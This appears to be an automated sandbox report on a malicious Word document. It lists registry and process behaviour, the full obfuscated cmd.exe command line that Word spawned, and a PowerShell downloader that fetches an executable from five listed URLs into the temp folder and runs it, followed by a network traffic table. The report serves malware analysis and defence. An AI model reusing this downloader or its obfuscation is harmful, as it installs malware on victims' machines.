| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 3940 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 1400 wrote to memory of 3940 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 3940 wrote to memory of 3984 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3940 wrote to memory of 3984 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3984 wrote to memory of 3956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3984 wrote to memory of 3956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\cmd.exe
cmd /c cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ 
\\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c
\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t
-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\system32\cmd.exe
cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ 
\\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c
\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t
-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4332,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | baominhonline.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | craquesdoradio.com.br | udp |
| US | 8.8.8.8:53 | csubiz.us | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.161:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ccoolmedia.com | udp |
| US | 8.8.8.8:53 | casellamoving.com | udp |
| US | 76.223.105.230:80 | casellamoving.com | tcp |
| US | 8.8.8.8:53 | 161.61.62.23.in-addr.arpa | udp |
| US | 76.223.105.230:443 | casellamoving.com | tcp |
| US | 8.8.8.8:53 | 230.105.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.184:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
| NL | 104.97.14.241:443 | binaries.templates.cdn.office.net | tcp |
